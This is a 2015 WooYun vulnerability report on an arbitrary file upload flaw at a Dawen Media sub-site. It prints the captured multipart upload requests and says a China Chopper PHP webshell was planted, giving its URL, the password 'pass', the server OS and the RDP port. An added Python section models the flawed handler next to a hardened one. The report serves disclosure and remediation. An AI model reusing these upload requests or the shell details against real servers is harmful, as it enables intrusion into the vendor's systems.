
Vulnerability summary

Defect ID: wooyun-2015-0100958

Title: Arbitrary file upload on a Dawen Media sub-site can lead to full server compromise

Affected vendor: dawenmedia.com

Author:

Submitted: 2015-03-12 18:00

Fixed: 2015-04-26 18:02

Published: 2015-04-26 18:02

Vulnerability type: file upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-12: Details sent to the vendor; awaiting vendor action
2015-03-12: Vendor confirmed; details visible to the vendor only
2015-03-22: Details disclosed to core white hats and domain experts
2015-04-01: Details disclosed to regular white hats
2015-04-11: Details disclosed to intern white hats
2015-04-26: Details disclosed to the public

Brief description:

*

Detailed description:

While browsing WooYun today I noticed a newly registered vendor, so I searched Google for it
and found an upload function at:

http://wx.api.dawenmedia.com/wxdw/register/bride


I then tried uploading a file. The upload request (from the screenshot) is:

POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106
------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.jpg"
Content-Type: image/jpeg
test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--


Next I changed the filename and the declared content type (the Content-Length header was left unchanged from the first capture):

POST /wxdw/upload/save HTTP/1.1
Host: wx.api.dawenmedia.com
Proxy-Connection: keep-alive
Content-Length: 195
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://wx.api.dawenmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5YWHdlXH7ttQHDmK
Referer: http://wx.api.dawenmedia.com/wxdw/register/bride
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=6309179392; pgv_si=s4291216384; pgv_info=ssid=s8697179060; ts_last=wx.api.dawenmedia.com/wxdw/jinkevote; ts_refer=s.bt.gg/; pgv_pvid=1644849566; ts_uid=3873108425; Hm_lvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106; Hm_lpvt_a0247029c8f03c1ce89b8e3a2fb49b9e=1426149106
------WebKitFormBoundary5YWHdlXH7ttQHDmK
Content-Disposition: form-data; name="myData"; filename="test.txt"
Content-Type: txt/txt
test wooyun
------WebKitFormBoundary5YWHdlXH7ttQHDmK--


Uploading the text file returned:

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 12 Mar 2015 08:40:17 GMT
Content-Length: 123
{"url":"attachment\/2015\/03\/20150312164017480509.txt","url_thumb":"attachment\/2015\/03\/20150312164017480509_thumb.txt"}


So the stored file's URL (the JSON "url" is relative to /wxdw/) is:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312164017480509.txt


Changing the extension to PHP gives the path:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162755649840.php


I then uploaded a one-line PHP webshell for Caidao (China Chopper) and got the URL:

http://wx.api.dawenmedia.com/wxdw/attachment/2015/03/20150312162934728860.php


Webshell password: pass

(screenshot: aa.png)


The server runs Windows Server 2008.

(screenshot: bb.png)


The terminal services (RDP) port is 33669.
I stopped here and did not run any privilege-escalation tools.
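The fix section below is empty, so the following added example (not the site's code, and not from the report's author) models the /wxdw/upload/save handler as the report describes it, next to a hardened version. Assumptions: the server reads the multipart part named "myData" and stores it as attachment/YYYY/MM/<timestamp+microseconds>.<extension>; that path format is copied from the JSON response above, while the handler internals, the function names and the two extra test files are constructed for illustration. The site itself is PHP on IIS; Python is used here only to make the logic runnable offline.

```python
"""Added example (not the site's code): a model of the /wxdw/upload/save
handler as the report describes it, next to a hardened version.

Assumed: the site parses the multipart part named "myData" and stores it as
attachment/YYYY/MM/<timestamp+microseconds>.<client extension>; the path
format is taken from the JSON response in the report, the rest is a guess.
"""
import os
import re
from datetime import datetime

BOUNDARY = "----WebKitFormBoundary5YWHdlXH7ttQHDmK"       # boundary from the captured request
REPORT_TIME = datetime(2015, 3, 12, 16, 40, 17, 480509)  # matches 20150312164017480509 on the page

# Image types the hardened handler accepts, keyed by their leading magic bytes.
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}


def build_multipart(filename, content_type, data, boundary=BOUNDARY):
    """Build the single-part body from the report: one file field called "myData"."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="myData"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal multipart/form-data parser; returns the "myData" part as a dict."""
    delim = f"--{boundary}".encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        chunk = chunk[2:]                    # CRLF after the boundary line
        if chunk.endswith(b"\r\n"):
            chunk = chunk[:-2]               # CRLF that belongs to the next boundary
        head, _, data = chunk.partition(b"\r\n\r\n")
        if b'name="myData"' not in head:
            continue
        fn = re.search(rb'filename="([^"]*)"', head)
        ct = re.search(rb"Content-Type:\s*([^\r\n]+)", head)
        return {"filename": fn.group(1).decode() if fn else "",
                "content_type": ct.group(1).decode().strip() if ct else "application/octet-stream",
                "data": data}
    raise ValueError('no "myData" part in body')


def stored_path(ext, now):
    """attachment/YYYY/MM/<YYYYMMDDhhmmss + microseconds>.<ext>, as in the report's JSON."""
    return f"attachment/{now:%Y/%m}/{now:%Y%m%d%H%M%S%f}.{ext}"


def save_upload_vulnerable(part, now):
    """What the report shows: the client-supplied extension is kept verbatim,
    so filename="x.php" becomes an executable .php file under the web root."""
    ext = os.path.splitext(part["filename"])[1].lstrip(".")
    return {"ok": True, "url": stored_path(ext, now)}


def save_upload_hardened(part, now):
    """Trust the bytes, not the client: require a known image signature, require the
    client extension to be on the allow-list, and name the file from the detected type."""
    data = part["data"]
    detected = next((e for magic, e in MAGIC.items() if data.startswith(magic)), None)
    if detected is None:
        return {"ok": False, "error": "content is not a recognised image"}
    client_ext = os.path.splitext(part["filename"])[1].lstrip(".").lower()
    if client_ext not in ALLOWED_EXT:
        return {"ok": False, "error": f"extension .{client_ext} is not allowed"}
    return {"ok": True, "url": stored_path(detected, now)}


def demo():
    """Run the report's two probes plus two constructed cases through both handlers."""
    cases = {
        "jpg_probe": ("test.jpg", "image/jpeg", b"test wooyun"),          # first request on the page
        "txt_probe": ("test.txt", "txt/txt", b"test wooyun"),             # second request on the page
        "php_file": ("shell.php", "image/jpeg", b"<?php phpinfo(); ?>"),  # constructed
        "real_jpeg": ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),  # constructed
    }
    results = {}
    for name, (filename, content_type, data) in cases.items():
        part = parse_multipart(build_multipart(filename, content_type, data))
        results[name] = {"vulnerable": save_upload_vulnerable(part, now=REPORT_TIME),
                         "hardened": save_upload_hardened(part, now=REPORT_TIME)}
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name:10} vulnerable={r['vulnerable']}  hardened={r['hardened']}")
```

The hardened handler only controls the extension and the signature; a valid JPEG with PHP appended still lands on disk as .jpg, so the attachment directory also needs no script handler mapped to it (on IIS, remove the PHP handler mapping for that folder) or should live outside the web root entirely. The predictable timestamp naming seen in the report is a smaller issue once the extension is no longer attacker-chosen.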

Proof of vulnerability:

Suggested fix:

*

Copyright notice: please credit @WooYun (乌云) as the source when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-03-12 20:18

Vendor reply:

Handled; the impact is quite serious.

Latest status:

None yet